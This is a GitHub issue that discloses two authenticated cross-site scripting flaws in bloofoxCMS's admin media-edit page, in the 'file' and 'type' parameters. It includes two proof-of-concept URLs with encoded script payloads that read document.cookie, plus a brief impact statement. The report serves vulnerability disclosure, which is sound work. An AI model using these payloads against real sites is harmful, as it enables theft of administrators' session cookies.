Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
I found two Authenticated Cross-Site Scripting in 'file' parameter and 'type' parameter
http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&type=0
http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg&type=%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
The attacker can execute a HTML/JS Code the attacker can stealing cookies
The text was updated successfully, but these errors were encountered:
No branches or pull requests
I found two Authenticated Cross-Site Scripting in 'file' parameter and 'type' parameter
Cross-Site Scripting in the parameter 'file'
Cross-Site Scripting in the parameter 'type'
Impact
The attacker can execute a HTML/JS Code the attacker can stealing cookies
The text was updated successfully, but these errors were encountered: